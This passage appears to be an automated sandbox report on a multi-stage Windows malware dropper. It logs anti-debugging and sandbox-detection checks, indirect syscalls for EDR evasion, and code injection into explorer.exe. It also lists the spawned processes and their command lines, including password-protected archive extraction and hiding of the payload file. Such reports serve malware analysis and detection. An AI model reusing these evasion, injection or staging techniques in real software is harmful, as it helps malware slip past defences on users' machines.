AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADE96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0A
Source: dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5)
Source: LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHhn
Source: PING.EXE, 00000027.00000002.269584208485.00000242D46E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEET
Source: file.exe, 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmp, 0d47c4c34f.exe, 00000005.00000001.269401411262.00000000002A0000.00000080.00000001.01000000.00000009.sdmp, 0d47c4c34f.exe, 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmp, 0d47c4c34f.exe, 00000005.00000000.269400467979.00000000002A0000.00000080.00000001.01000000.00000009.sdmp, axplong.exe, 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmp, axplong.exe, 00000006.00000000.269456458173.0000000000820000.00000080.00000001.01000000.0000000A.sdmp, axplong.exe, 00000008.00000000.269464637148.0000000000820000.00000080.00000001.01000000.0000000A.sdmp, axplong.exe, 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: dwVrTdy.exe, 00000028.00000002.269664887145.00000256355C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: PING.EXE, 00000021.00000002.269574952643.00000241A6F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10070
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10057
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10760
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API call chain: ExitProcess graph end node	graph_8-11365
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API call chain: ExitProcess graph end node	graph_8-11422

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort
Source: C:\Windows\explorer.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04AC0C8E rdtsc

0_2_04AC0C8E

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B966A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,

12_2_00B966A8

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069652B mov eax, dword ptr fs:[00000030h]	0_2_0069652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069A302 mov eax, dword ptr fs:[00000030h]	0_2_0069A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009FA302 mov eax, dword ptr fs:[00000030h]	2_2_009FA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009F652B mov eax, dword ptr fs:[00000030h]	2_2_009F652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_009FA302 mov eax, dword ptr fs:[00000030h]	3_2_009FA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_009F652B mov eax, dword ptr fs:[00000030h]	3_2_009F652B
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000E645B mov eax, dword ptr fs:[00000030h]	5_2_000E645B
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000EA1C2 mov eax, dword ptr fs:[00000030h]	5_2_000EA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0066A1C2 mov eax, dword ptr fs:[00000030h]	6_2_0066A1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0066645B mov eax, dword ptr fs:[00000030h]	6_2_0066645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_0066A1C2 mov eax, dword ptr fs:[00000030h]	8_2_0066A1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_0066645B mov eax, dword ptr fs:[00000030h]	8_2_0066645B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtDeviceIoControlFile: Indirect: 0x1F058B02B9D
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateValueKey: Indirect: 0x1F058B0293D
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateKey: Indirect: 0x1D188C72842
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateKey: Indirect: 0x1D188C72875
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtResumeThread: Indirect: 0x1F058B0231E
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtQuerySystemInformation: Indirect: 0x1D188C7205D
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtQuerySystemInformation: Indirect: 0x18B0B5A205D
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateValueKey: Indirect: 0x1F058B0290E
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtResumeThread: Indirect: 0x1D188C7231E
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateKey: Indirect: 0x18B0B5A2842
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateKey: Indirect: 0x18B0B5A2875
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateKey: Indirect: 0x1F058B02842
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateKey: Indirect: 0x1F058B02875
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateValueKey: Indirect: 0x1D188C7293D
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateValueKey: Indirect: 0x18B0B5A293D
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateValueKey: Indirect: 0x1D188C7290E
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtEnumerateValueKey: Indirect: 0x18B0B5A290E
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtDeviceIoControlFile: Indirect: 0x1D188C72B9D
Source: C:\Program Files\Windows Media Player\graph\graph.exe	NtQuerySystemInformation: Indirect: 0x1F058B0205D

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe

Memory written: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe base: 400000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 7840 base: AE1010 value: 00

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Thread register set: target process: 7840

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe "C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe "C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Process created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Process created: unknown unknown

Source: file.exe, 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: axplong.exe, axplong.exe, 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: :dProgram Manager

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B9D690 cpuid

12_2_00B9D690

Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher VolumeInformation
